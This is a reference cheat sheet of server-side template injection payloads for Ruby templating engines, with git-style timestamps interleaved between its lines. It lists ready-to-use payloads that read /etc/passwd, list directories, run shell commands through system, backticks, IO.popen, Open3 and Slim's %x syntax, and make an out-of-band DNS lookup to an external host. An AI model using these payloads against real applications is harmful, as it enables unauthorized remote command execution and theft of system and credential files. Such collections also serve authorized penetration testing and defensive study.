2024-10-23 11:59:18 +00:00
# Server Side Template Injection - Ruby
## Summary
2024-11-02 16:42:18 +00:00
- [Templating Libraries ](#templating-libraries )
2024-10-23 11:59:18 +00:00
- [Ruby ](#ruby )
- [Ruby - Basic injections ](#ruby---basic-injections )
- [Ruby - Retrieve /etc/passwd ](#ruby---retrieve-etcpasswd )
- [Ruby - List files and directories ](#ruby---list-files-and-directories )
2024-11-02 16:42:18 +00:00
- [Ruby - Remote Command execution ](#ruby---remote-Command-execution )
2024-11-03 19:54:01 +00:00
- [References ](#referenecs )
2024-11-02 16:42:18 +00:00
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Erb | `<%= %>` |
| Erubi | `<%= %>` |
| Erubis | `<%= %>` |
| HAML | `#{ }` |
| Liquid | `{{ }}` |
| Mustache | `{{ }}` |
| Slim | `#{ }` |
2024-10-23 11:59:18 +00:00
## Ruby
### Ruby - Basic injections
**ERB**:
```ruby
< %= 7 * 7 %>
```
**Slim**:
```ruby
#{ 7 * 7 }
```
### Ruby - Retrieve /etc/passwd
```ruby
< %= File.open('/etc/passwd').read %>
```
### Ruby - List files and directories
```ruby
< %= Dir.entries('/') %>
```
2024-11-02 16:42:18 +00:00
### Ruby - Remote Command execution
2024-10-23 11:59:18 +00:00
2024-11-02 16:42:18 +00:00
Execute code using SSTI for **Erb** ,**Erubi**,**Erubis** engine.
2024-10-23 11:59:18 +00:00
```ruby
2024-11-02 16:42:18 +00:00
< %=(`nslookup oastify.com`)%>
2024-10-23 11:59:18 +00:00
< %= system('cat /etc/passwd') %>
< %= `ls /` %>
< %= IO.popen('ls /').readlines() %>
< % require 'open3' %>< % @a ,@b,@c,@d=Open3.popen3('whoami') %>< %= @b .readline()%>
< % require 'open4' %>< % @a ,@b,@c,@d=Open4.popen4('whoami') %>< %= @c .readline()%>
```
Execute code using SSTI for **Slim** engine.
```powershell
#{ %x|env| }
```
2024-11-03 19:54:01 +00:00
## References
* [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017 ](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/ )